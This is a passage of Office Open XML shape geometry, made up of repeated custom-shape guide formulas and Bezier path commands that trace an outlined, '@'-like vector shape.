                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3063923 h 3939732"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3500815 h 3939732"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3895311 h 3939732"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2371338 h 3939732"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 36923 h 3939732"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3897869"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3897869"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3897869"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3897869"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3897869"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3897869"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3897869"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3897869"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3897869"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3897869"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3897869"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3897869"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3897869"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3897869"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3897869"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3897869"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3897869"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3897869"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3897869"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3897869"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3897869"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3897869"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3897869"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3897869"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3897869"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3897869"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3897869"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3897869"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3897869"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3897869"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3897869"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3897869"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3897869"/>
                <a:gd name="connsiteY35" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3876965"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3876965"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3876965"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3876965"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3876965"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3876965"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3876965"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3876965"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3670773 w 3876965"/>
                <a:gd name="connsiteY9" fmla="*/ 2425440 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3671055 w 3876965"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3164582 w 3876965"/>
                <a:gd name="connsiteY11" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3176822 w 3876965"/>
                <a:gd name="connsiteY12" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3146203 w 3876965"/>
                <a:gd name="connsiteY13" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 3151211 w 3876965"/>
                <a:gd name="connsiteY14" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2397082 w 3876965"/>
                <a:gd name="connsiteY15" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 2396219 w 3876965"/>
                <a:gd name="connsiteY16" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY17" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 990519 w 3876965"/>
                <a:gd name="connsiteY18" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1593790 w 3876965"/>
                <a:gd name="connsiteY19" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 1746058 w 3876965"/>
                <a:gd name="connsiteY20" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2206475 w 3876965"/>
                <a:gd name="connsiteY21" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2185910 w 3876965"/>
                <a:gd name="connsiteY22" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2656644 w 3876965"/>
                <a:gd name="connsiteY23" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 2828567 w 3876965"/>
                <a:gd name="connsiteY24" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3312378 w 3876965"/>
                <a:gd name="connsiteY25" fmla="*/ 2041592 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3289926 w 3876965"/>
                <a:gd name="connsiteY26" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3290031 w 3876965"/>
                <a:gd name="connsiteY27" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 1700745 w 3876965"/>
                <a:gd name="connsiteY28" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 571995 w 3876965"/>
                <a:gd name="connsiteY29" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2267548 w 3876965"/>
                <a:gd name="connsiteY30" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3194376 w 3876965"/>
                <a:gd name="connsiteY31" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 3268026 w 3876965"/>
                <a:gd name="connsiteY32" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 2347298 w 3876965"/>
                <a:gd name="connsiteY33" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 42617 w 3876965"/>
                <a:gd name="connsiteY34" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX35" fmla="*/ 1594841 w 3876965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671055 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2426383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704679 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2448797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164582 w 3888568"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3888568"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3888568"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3888568"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3888568"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3888568"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3888568"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3888568"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3888568"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3888568"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3888568"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3888568"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3888568"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3888568"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3888568"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3888568"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3888568"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3888568"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3888568"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3888568"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3888568"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3888568"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3888568"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3888568"/>
                <a:gd name="connsiteY34" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX0" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY0" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX1" fmla="*/ 1768767 w 3892469"/>
                <a:gd name="connsiteY1" fmla="*/ 1390324 h 3948462"/>
                <a:gd name="connsiteX2" fmla="*/ 1517577 w 3892469"/>
                <a:gd name="connsiteY2" fmla="*/ 2042010 h 3948462"/>
                <a:gd name="connsiteX3" fmla="*/ 1928990 w 3892469"/>
                <a:gd name="connsiteY3" fmla="*/ 2639747 h 3948462"/>
                <a:gd name="connsiteX4" fmla="*/ 2318674 w 3892469"/>
                <a:gd name="connsiteY4" fmla="*/ 2006358 h 3948462"/>
                <a:gd name="connsiteX5" fmla="*/ 2293344 w 3892469"/>
                <a:gd name="connsiteY5" fmla="*/ 1834228 h 3948462"/>
                <a:gd name="connsiteX6" fmla="*/ 1853384 w 3892469"/>
                <a:gd name="connsiteY6" fmla="*/ 1371624 h 3948462"/>
                <a:gd name="connsiteX7" fmla="*/ 1594841 w 3892469"/>
                <a:gd name="connsiteY7" fmla="*/ 45653 h 3948462"/>
                <a:gd name="connsiteX8" fmla="*/ 3869632 w 3892469"/>
                <a:gd name="connsiteY8" fmla="*/ 1517323 h 3948462"/>
                <a:gd name="connsiteX9" fmla="*/ 3706266 w 3892469"/>
                <a:gd name="connsiteY9" fmla="*/ 2457195 h 3948462"/>
                <a:gd name="connsiteX10" fmla="*/ 3164582 w 3892469"/>
                <a:gd name="connsiteY10" fmla="*/ 2831059 h 3948462"/>
                <a:gd name="connsiteX11" fmla="*/ 3176822 w 3892469"/>
                <a:gd name="connsiteY11" fmla="*/ 2844986 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 3146203 w 3892469"/>
                <a:gd name="connsiteY12" fmla="*/ 2843756 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 3151211 w 3892469"/>
                <a:gd name="connsiteY13" fmla="*/ 2836155 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2397082 w 3892469"/>
                <a:gd name="connsiteY14" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 2396219 w 3892469"/>
                <a:gd name="connsiteY15" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY16" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 990519 w 3892469"/>
                <a:gd name="connsiteY17" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1593790 w 3892469"/>
                <a:gd name="connsiteY18" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 1746058 w 3892469"/>
                <a:gd name="connsiteY19" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2206475 w 3892469"/>
                <a:gd name="connsiteY20" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2185910 w 3892469"/>
                <a:gd name="connsiteY21" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2656644 w 3892469"/>
                <a:gd name="connsiteY22" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 2828567 w 3892469"/>
                <a:gd name="connsiteY23" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3362812 w 3892469"/>
                <a:gd name="connsiteY24" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3289926 w 3892469"/>
                <a:gd name="connsiteY25" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 3290031 w 3892469"/>
                <a:gd name="connsiteY26" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 1700745 w 3892469"/>
                <a:gd name="connsiteY27" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 571995 w 3892469"/>
                <a:gd name="connsiteY28" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2267548 w 3892469"/>
                <a:gd name="connsiteY29" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3194376 w 3892469"/>
                <a:gd name="connsiteY30" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 3268026 w 3892469"/>
                <a:gd name="connsiteY31" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 2347298 w 3892469"/>
                <a:gd name="connsiteY32" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 42617 w 3892469"/>
                <a:gd name="connsiteY33" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX34" fmla="*/ 1594841 w 3892469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2397082 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY32" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX33" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY33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2397082 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY31" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX32" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY32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2397082 w 3890413"/>
                <a:gd name="connsiteY11" fmla="*/ 2564681 h 3948462"/>
                <a:gd name="connsiteX12" fmla="*/ 2396219 w 3890413"/>
                <a:gd name="connsiteY12" fmla="*/ 2558207 h 3948462"/>
                <a:gd name="connsiteX13" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY13" fmla="*/ 3093574 h 3948462"/>
                <a:gd name="connsiteX14" fmla="*/ 990519 w 3890413"/>
                <a:gd name="connsiteY14" fmla="*/ 2019783 h 3948462"/>
                <a:gd name="connsiteX15" fmla="*/ 1593790 w 3890413"/>
                <a:gd name="connsiteY15" fmla="*/ 967808 h 3948462"/>
                <a:gd name="connsiteX16" fmla="*/ 1746058 w 3890413"/>
                <a:gd name="connsiteY16" fmla="*/ 945992 h 3948462"/>
                <a:gd name="connsiteX17" fmla="*/ 2206475 w 3890413"/>
                <a:gd name="connsiteY17" fmla="*/ 1173924 h 3948462"/>
                <a:gd name="connsiteX18" fmla="*/ 2185910 w 3890413"/>
                <a:gd name="connsiteY18" fmla="*/ 877882 h 3948462"/>
                <a:gd name="connsiteX19" fmla="*/ 2656644 w 3890413"/>
                <a:gd name="connsiteY19" fmla="*/ 803138 h 3948462"/>
                <a:gd name="connsiteX20" fmla="*/ 2828567 w 3890413"/>
                <a:gd name="connsiteY20" fmla="*/ 2099525 h 3948462"/>
                <a:gd name="connsiteX21" fmla="*/ 3362812 w 3890413"/>
                <a:gd name="connsiteY21" fmla="*/ 2002360 h 3948462"/>
                <a:gd name="connsiteX22" fmla="*/ 3289926 w 3890413"/>
                <a:gd name="connsiteY22" fmla="*/ 1346695 h 3948462"/>
                <a:gd name="connsiteX23" fmla="*/ 3290031 w 3890413"/>
                <a:gd name="connsiteY23" fmla="*/ 1346798 h 3948462"/>
                <a:gd name="connsiteX24" fmla="*/ 1700745 w 3890413"/>
                <a:gd name="connsiteY24" fmla="*/ 575031 h 3948462"/>
                <a:gd name="connsiteX25" fmla="*/ 571995 w 3890413"/>
                <a:gd name="connsiteY25" fmla="*/ 2274165 h 3948462"/>
                <a:gd name="connsiteX26" fmla="*/ 2267548 w 3890413"/>
                <a:gd name="connsiteY26" fmla="*/ 3408286 h 3948462"/>
                <a:gd name="connsiteX27" fmla="*/ 3194376 w 3890413"/>
                <a:gd name="connsiteY27" fmla="*/ 3072653 h 3948462"/>
                <a:gd name="connsiteX28" fmla="*/ 3268026 w 3890413"/>
                <a:gd name="connsiteY28" fmla="*/ 3509545 h 3948462"/>
                <a:gd name="connsiteX29" fmla="*/ 2347298 w 3890413"/>
                <a:gd name="connsiteY29" fmla="*/ 3904041 h 3948462"/>
                <a:gd name="connsiteX30" fmla="*/ 42617 w 3890413"/>
                <a:gd name="connsiteY30" fmla="*/ 2380068 h 3948462"/>
                <a:gd name="connsiteX31" fmla="*/ 1594841 w 3890413"/>
                <a:gd name="connsiteY31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0413" h="3948462">
                  <a:moveTo>
                    <a:pt x="1853384" y="1371624"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1768767" y="1390324"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1579409" y="1463487"/>
                    <a:pt x="1490873" y="1833773"/>
                    <a:pt x="1517577" y="2042010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1544281" y="2250247"/>
                    <a:pt x="1644086" y="2624290"/>
                    <a:pt x="1928990" y="2639747"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2177093" y="2653207"/>
                    <a:pt x="2337423" y="2363017"/>
                    <a:pt x="2318674" y="2006358"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2310210" y="1948950"/>
                    <a:pt x="2301678" y="1891436"/>
                    <a:pt x="2293344" y="1834228"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2229725" y="1555945"/>
                    <a:pt x="2050691" y="1359067"/>
                    <a:pt x="1853384" y="1371624"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="1594841" y="45653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2527821" y="-128041"/>
                    <a:pt x="3626282" y="158796"/>
                    <a:pt x="3869632" y="1517323"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3939308" y="2058696"/>
                    <a:pt x="3820785" y="2251376"/>
                    <a:pt x="3706266" y="2457195"/>
                  </a:cubicBezTo>
